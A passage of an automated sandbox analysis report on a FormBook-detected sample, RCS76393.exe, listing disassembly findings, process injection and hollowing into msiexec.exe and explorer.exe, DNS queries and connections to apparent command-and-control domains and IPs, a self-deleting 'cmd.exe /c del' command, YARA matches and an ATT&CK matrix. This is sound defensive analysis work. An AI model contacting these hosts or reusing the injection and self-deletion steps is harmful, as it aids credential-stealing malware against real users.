          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046505AC mov eax, dword ptr fs:[00000030h]7_2_046505AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046505AC mov eax, dword ptr fs:[00000030h]7_2_046505AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581 mov eax, dword ptr fs:[00000030h]7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581 mov eax, dword ptr fs:[00000030h]7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581 mov eax, dword ptr fs:[00000030h]7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581 mov eax, dword ptr fs:[00000030h]7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B1DB5 mov eax, dword ptr fs:[00000030h]7_2_045B1DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B1DB5 mov eax, dword ptr fs:[00000030h]7_2_045B1DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B1DB5 mov eax, dword ptr fs:[00000030h]7_2_045B1DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B35A1 mov eax, dword ptr fs:[00000030h]7_2_045B35A1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464AE44 mov eax, dword ptr fs:[00000030h]7_2_0464AE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464AE44 mov eax, dword ptr fs:[00000030h]7_2_0464AE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459766D mov eax, dword ptr fs:[00000030h]7_2_0459766D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA61C mov eax, dword ptr fs:[00000030h]7_2_045BA61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA61C mov eax, dword ptr fs:[00000030h]7_2_045BA61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458C600 mov eax, dword ptr fs:[00000030h]7_2_0458C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458C600 mov eax, dword ptr fs:[00000030h]7_2_0458C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458C600 mov eax, dword ptr fs:[00000030h]7_2_0458C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B8E00 mov eax, dword ptr fs:[00000030h]7_2_045B8E00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463FE3F mov eax, dword ptr fs:[00000030h]7_2_0463FE3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641608 mov eax, dword ptr fs:[00000030h]7_2_04641608
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458E620 mov eax, dword ptr fs:[00000030h]7_2_0458E620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B36CC mov eax, dword ptr fs:[00000030h]7_2_045B36CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C8EC7 mov eax, dword ptr fs:[00000030h]7_2_045C8EC7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463FEC0 mov eax, dword ptr fs:[00000030h]7_2_0463FEC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04658ED6 mov eax, dword ptr fs:[00000030h]7_2_04658ED6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B16E0 mov ecx, dword ptr fs:[00000030h]7_2_045B16E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045976E2 mov eax, dword ptr fs:[00000030h]7_2_045976E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04650EA5 mov eax, dword ptr fs:[00000030h]7_2_04650EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04650EA5 mov eax, dword ptr fs:[00000030h]7_2_04650EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04650EA5 mov eax, dword ptr fs:[00000030h]7_2_04650EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046046A7 mov eax, dword ptr fs:[00000030h]7_2_046046A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461FE87 mov eax, dword ptr fs:[00000030h]7_2_0461FE87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04658F6A mov eax, dword ptr fs:[00000030h]7_2_04658F6A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459EF40 mov eax, dword ptr fs:[00000030h]7_2_0459EF40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459FF60 mov eax, dword ptr fs:[00000030h]7_2_0459FF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AF716 mov eax, dword ptr fs:[00000030h]7_2_045AF716
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA70E mov eax, dword ptr fs:[00000030h]7_2_045BA70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA70E mov eax, dword ptr fs:[00000030h]7_2_045BA70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465070D mov eax, dword ptr fs:[00000030h]7_2_0465070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465070D mov eax, dword ptr fs:[00000030h]7_2_0465070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BE730 mov eax, dword ptr fs:[00000030h]7_2_045BE730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461FF10 mov eax, dword ptr fs:[00000030h]7_2_0461FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461FF10 mov eax, dword ptr fs:[00000030h]7_2_0461FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04584F2E mov eax, dword ptr fs:[00000030h]7_2_04584F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04584F2E mov eax, dword ptr fs:[00000030h]7_2_04584F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C37F5 mov eax, dword ptr fs:[00000030h]7_2_045C37F5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04598794 mov eax, dword ptr fs:[00000030h]7_2_04598794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607794 mov eax, dword ptr fs:[00000030h]7_2_04607794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607794 mov eax, dword ptr fs:[00000030h]7_2_04607794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607794 mov eax, dword ptr fs:[00000030h]7_2_04607794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A0050 mov eax, dword ptr fs:[00000030h]7_2_045A0050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A0050 mov eax, dword ptr fs:[00000030h]7_2_045A0050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04651074 mov eax, dword ptr fs:[00000030h]7_2_04651074
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04642073 mov eax, dword ptr fs:[00000030h]7_2_04642073
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654015 mov eax, dword ptr fs:[00000030h]7_2_04654015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654015 mov eax, dword ptr fs:[00000030h]7_2_04654015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B02A mov eax, dword ptr fs:[00000030h]7_2_0459B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B02A mov eax, dword ptr fs:[00000030h]7_2_0459B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B02A mov eax, dword ptr fs:[00000030h]7_2_0459B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B02A mov eax, dword ptr fs:[00000030h]7_2_0459B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607016 mov eax, dword ptr fs:[00000030h]7_2_04607016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607016 mov eax, dword ptr fs:[00000030h]7_2_04607016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607016 mov eax, dword ptr fs:[00000030h]7_2_04607016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045858EC mov eax, dword ptr fs:[00000030h]7_2_045858EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589080 mov eax, dword ptr fs:[00000030h]7_2_04589080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BF0BF mov ecx, dword ptr fs:[00000030h]7_2_045BF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BF0BF mov eax, dword ptr fs:[00000030h]7_2_045BF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BF0BF mov eax, dword ptr fs:[00000030h]7_2_045BF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04603884 mov eax, dword ptr fs:[00000030h]7_2_04603884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04603884 mov eax, dword ptr fs:[00000030h]7_2_04603884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C90AF mov eax, dword ptr fs:[00000030h]7_2_045C90AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AB944 mov eax, dword ptr fs:[00000030h]7_2_045AB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AB944 mov eax, dword ptr fs:[00000030h]7_2_045AB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B171 mov eax, dword ptr fs:[00000030h]7_2_0458B171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B171 mov eax, dword ptr fs:[00000030h]7_2_0458B171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458C962 mov eax, dword ptr fs:[00000030h]7_2_0458C962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589100 mov eax, dword ptr fs:[00000030h]7_2_04589100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589100 mov eax, dword ptr fs:[00000030h]7_2_04589100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589100 mov eax, dword ptr fs:[00000030h]7_2_04589100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B513A mov eax, dword ptr fs:[00000030h]7_2_045B513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B513A mov eax, dword ptr fs:[00000030h]7_2_045B513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov eax, dword ptr fs:[00000030h]7_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov eax, dword ptr fs:[00000030h]7_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov eax, dword ptr fs:[00000030h]7_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov eax, dword ptr fs:[00000030h]7_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120 mov ecx, dword ptr fs:[00000030h]7_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046141E8 mov eax, dword ptr fs:[00000030h]7_2_046141E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B1E1 mov eax, dword ptr fs:[00000030h]7_2_0458B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B1E1 mov eax, dword ptr fs:[00000030h]7_2_0458B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B1E1 mov eax, dword ptr fs:[00000030h]7_2_0458B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046069A6 mov eax, dword ptr fs:[00000030h]7_2_046069A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2990 mov eax, dword ptr fs:[00000030h]7_2_045B2990
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AC182 mov eax, dword ptr fs:[00000030h]7_2_045AC182
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA185 mov eax, dword ptr fs:[00000030h]7_2_045BA185
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046051BE mov eax, dword ptr fs:[00000030h]7_2_046051BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046051BE mov eax, dword ptr fs:[00000030h]7_2_046051BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046051BE mov eax, dword ptr fs:[00000030h]7_2_046051BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046051BE mov eax, dword ptr fs:[00000030h]7_2_046051BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B61A0 mov eax, dword ptr fs:[00000030h]7_2_045B61A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B61A0 mov eax, dword ptr fs:[00000030h]7_2_045B61A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463B260 mov eax, dword ptr fs:[00000030h]7_2_0463B260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463B260 mov eax, dword ptr fs:[00000030h]7_2_0463B260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04658A62 mov eax, dword ptr fs:[00000030h]7_2_04658A62
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589240 mov eax, dword ptr fs:[00000030h]7_2_04589240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589240 mov eax, dword ptr fs:[00000030h]7_2_04589240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589240 mov eax, dword ptr fs:[00000030h]7_2_04589240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589240 mov eax, dword ptr fs:[00000030h]7_2_04589240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C927A mov eax, dword ptr fs:[00000030h]7_2_045C927A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464EA55 mov eax, dword ptr fs:[00000030h]7_2_0464EA55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04614257 mov eax, dword ptr fs:[00000030h]7_2_04614257
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A3A1C mov eax, dword ptr fs:[00000030h]7_2_045A3A1C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04585210 mov eax, dword ptr fs:[00000030h]7_2_04585210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04585210 mov ecx, dword ptr fs:[00000030h]7_2_04585210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04585210 mov eax, dword ptr fs:[00000030h]7_2_04585210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04585210 mov eax, dword ptr fs:[00000030h]7_2_04585210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458AA16 mov eax, dword ptr fs:[00000030h]7_2_0458AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458AA16 mov eax, dword ptr fs:[00000030h]7_2_0458AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04598A0A mov eax, dword ptr fs:[00000030h]7_2_04598A0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C4A2C mov eax, dword ptr fs:[00000030h]7_2_045C4A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C4A2C mov eax, dword ptr fs:[00000030h]7_2_045C4A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2ACB mov eax, dword ptr fs:[00000030h]7_2_045B2ACB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2AE4 mov eax, dword ptr fs:[00000030h]7_2_045B2AE4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BD294 mov eax, dword ptr fs:[00000030h]7_2_045BD294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BD294 mov eax, dword ptr fs:[00000030h]7_2_045BD294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459AAB0 mov eax, dword ptr fs:[00000030h]7_2_0459AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459AAB0 mov eax, dword ptr fs:[00000030h]7_2_0459AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BFAB0 mov eax, dword ptr fs:[00000030h]7_2_045BFAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045852A5 mov eax, dword ptr fs:[00000030h]7_2_045852A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045852A5 mov eax, dword ptr fs:[00000030h]7_2_045852A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045852A5 mov eax, dword ptr fs:[00000030h]7_2_045852A5
          Source: C:\Users\user\Desktop\RCS76393.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.libreo.club
          Source: C:\Windows\explorer.exeDomain query: www.breathharbour.net
          Source: C:\Windows\explorer.exeDomain query: www.generalflix.com
          Source: C:\Windows\explorer.exeDomain query: www.vbkulkarni.com
          Source: C:\Windows\explorer.exeDomain query: www.pimpmyrecipe.com
          Source: C:\Windows\explorer.exeDomain query: www.csgo-roll.net
          Source: C:\Windows\explorer.exeNetwork Connect: 85.159.66.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.161.84.100 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 94.46.9.37 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.addthat.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.foodsystemsjusticeproject.com
          Source: C:\Windows\explorer.exeDomain query: www.batiktintaemas.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 193.168.194.206 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ronwongart.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.160.174.177 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.evecrude.xyz
          Source: C:\Windows\explorer.exeDomain query: www.ly-iot.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\RCS76393.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RCS76393.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RCS76393.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RCS76393.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RCS76393.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\RCS76393.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1A0000Jump to behavior
          Source: C:\Users\user\Desktop\RCS76393.exeProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.338938773.0000000004F80000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 2_2_0040B530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0040B530

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection512Virtualization/Sandbox Evasion2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection512LSASS MemorySecurity Software Discovery121Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
